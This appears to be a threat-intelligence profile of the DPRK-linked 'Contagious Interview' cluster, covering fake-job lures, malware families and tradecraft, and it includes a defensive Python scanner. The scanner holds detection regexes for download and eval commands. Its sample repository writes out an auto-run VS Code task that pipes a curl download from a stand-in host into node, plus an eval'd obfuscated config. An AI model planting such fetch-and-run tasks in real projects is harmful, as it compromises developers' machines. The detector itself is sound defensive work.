Contagious Interview
Contagious Interview is a North Korea-linked threat actor cluster, also described in the provided reporting as DPRK-connected or North Korea-aligned/state-sponsored. Known aliases in the content include UNC5342, Famous Chollima, Void Dokkaebi, DeceptiveDevelopment, DEV#POPPER, BeaverTail, InvisibleFerret, OtterCookie, Gwisin Gang, and Tenacious Pungsan. The content also notes overlap with WageMole campaigns and links or similarities to Lazarus, BlueNoroff, APT38, and broader Lazarus umbrella activity. The group primarily targets software developers, especially those involved in cryptocurrency projects, through fake job interviews, recruiter personas, bogus technical assessments, trojanized codebases, compromised open-source packages, and malicious repositories. Reported targeting includes PHP developers via a compromised Packagist package, developers via poisoned npm packages, and broader software developers globally through sham cryptocurrency-company recruiting. The content also describes the group’s role in North Korean remote IT-worker fraud schemes, including long-term relationship building with high-value targets and use of AI-assisted workflows to sustain high operational tempo. Observed malware and tooling in the content include BeaverTail, InvisibleFerret, OtterCookie, DEV#POPPER, Tropidoor, TsunamiKit, MicrosoftSystem64, and activity aligned with PHANTOMPULSE/REF6598. 
BeaverTail is described as an infostealer/downloader used in fake job challenges and staged delivery; InvisibleFerret as a modular malware family providing information theft and remote control; OtterCookie as a BeaverTail-like stealer; Tropidoor as a backdoor with substantial code overlap to Lazarus PostNapTea; TsunamiKit as a multi-stage toolkit including droppers, installers, Tor proxy, coinminers, and a .NET spyware payload; and MicrosoftSystem64 as a cross-platform RAT stealing browser credentials, cryptocurrency wallet data, Telegram sessions, SSH keys, keystrokes, and screenshots while using HuggingFace for payload hosting and exfiltration.
Tradecraft described in the content includes:
- malicious VS Code tasks in .vscode/tasks.json that execute automatically once a workspace is trusted;
- obfuscated JavaScript hidden in ignored configuration files such as tailwind or eslint configs;
- commit tampering to conceal malicious changes;
- blockchain-based dead-drop resolvers and payload hosting on TRON, Aptos, BNB Smart Chain, Ethereum, Base, and Optimism;
- XOR, Base64, hexadecimal string encoding, and other obfuscation;
- use of AnyDesk;
- VBS scripts to launch cmd.exe and batch files;
- Startup-folder persistence via InvisibleFerret;
- exfiltration to actor-controlled C2 and Dropbox;
- OS fingerprinting via browser User-Agent;
- requests that victims disable Docker or other container environments to ensure infection.
The content also attributes broader campaigns to this cluster involving compromised open-source ecosystems and cryptocurrency-focused intrusions. These include poisoned npm packages, a compromised Packagist development branch, and malware delivery through fake interview workflows.
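As an added defensive example (not code from the reporting summarised here), a small repository scanner for two of the tradecraft items above: VS Code tasks that auto-run when a trusted folder is opened, and obfuscated JavaScript in config files developers rarely read. The config file names, the regex heuristics and the constructed sample repository are assumptions of this example; `runOptions.runOn: "folderOpen"` is the standard VS Code setting that starts a task on folder open.

```python
import json, os, re, tempfile

# Heuristics for two tradecraft items above: VS Code tasks that run on folder open
# (runOptions.runOn == "folderOpen", fires once the workspace is trusted) and obfuscated
# JavaScript in config files developers rarely read. Names/thresholds are assumptions.
SUSPECT_CMD = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|node\s+-e|eval|base64)\b", re.I)
OBFUSCATED = re.compile(r"eval\(|new Function\(|fromCharCode|child_process|(?:\\x[0-9a-fA-F]{2}){8,}|[A-Za-z0-9+/=]{80,}")
CONFIG_FILES = {"tailwind.config.js", "postcss.config.js", ".eslintrc.js", "eslint.config.js"}

def check_tasks_json(path):
    findings = []
    with open(path, encoding="utf-8") as f:  # tasks.json is JSONC; drop whole-line // comments
        data = json.loads("".join(l for l in f if not l.lstrip().startswith("//")))
    for task in data.get("tasks", []):
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        if task.get("runOptions", {}).get("runOn") == "folderOpen" and SUSPECT_CMD.search(cmd):
            findings.append(("auto-run task", task.get("label", "?"), cmd))
    return findings

def check_config_js(path):
    with open(path, encoding="utf-8") as f:
        m = OBFUSCATED.search(f.read())
    return [("obfuscated config", os.path.basename(path), m.group(0)[:32])] if m else []

def scan_repo(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name == "tasks.json" and os.path.basename(dirpath) == ".vscode":
                findings += check_tasks_json(full)
            elif name in CONFIG_FILES:
                findings += check_config_js(full)
    return findings

def build_sample_repo():
    # Constructed sample: a benign build task, an auto-run task piping a download
    # into node, and a tailwind config that eval()s a hex-escaped string.
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, ".vscode"))
    tasks = {"version": "2.0.0", "tasks": [
        {"label": "build", "type": "shell", "command": "npm run build"},
        {"label": "setup", "type": "shell", "command": "curl -s https://example.invalid/x | node",
         "runOptions": {"runOn": "folderOpen"}}]}
    with open(os.path.join(root, ".vscode", "tasks.json"), "w") as f:
        f.write("// constructed sample\n" + json.dumps(tasks))
    with open(os.path.join(root, "tailwind.config.js"), "w") as f:
        f.write("module.exports = {content: ['./src/**/*.html']};\n"
                "const k = '" + "\\x41" * 10 + "';\neval(k);\n")
    return root
```

Run `scan_repo(build_sample_repo())` to see both findings; in practice point `scan_repo` at a cloned interview assignment before opening it in an editor that trusts the workspace.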
Additional reporting in the content links Contagious Interview to campaigns targeting the cryptocurrency sector and developers, with malware capable of credential theft, wallet theft, screenshot capture, keylogging, clipboard monitoring, persistence across Windows/macOS/Linux, and follow-on payload delivery.
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Financial Services
Where they're from
Attributed origin per open-source reporting.
- KP
Tradecraft
59 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
34 malware families attributed to this actor across reporting.
29 additional families tracked in Mallory.
Associated vulnerabilities
2 CVEs this actor has used in observed campaigns, both exploited in the wild.
"A critical remote code execution (RCE) vulnerability, identified as CVE-2025-55182 and dubbed React2Shell, exists within the React Server Components (RSC) architecture, allowing unauthenticated attackers to execute arbitrary code..."
This detection identifies instances where Windows Explorer.exe spawns PowerShell or cmd.exe processes, particularly focusing on executions initiated by LNK files. This behavior is associated with the ZDI-CAN-25373 Windows shortcut zero-day vulnerability, where specially crafted LNK files are used to trigger malicious code execution through cmd.exe or powershell.exe. This technique has been actively exploited by multiple APT groups in targeted attacks through both HTTP and SMB delivery methods.
Observables
285 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as a DPRK-linked activity cluster whose tradecraft overlaps with the PHANTOMPULSE campaign, including crypto-sector targeting and multi-platform operations.
Targeting software developers through a compromised Packagist PHP package dev branch, likely as part of fake interview or onboarding lures, using blockchain-based dead-drop payload retrieval and malware associated with prior developer-focused operations.
Targeting PHP developers through a compromised Packagist package.
Supply-chain campaign targeting developers via poisoned npm packages that deploy the MicrosoftSystem64 remote access trojan and exfiltrate stolen data through HuggingFace private datasets.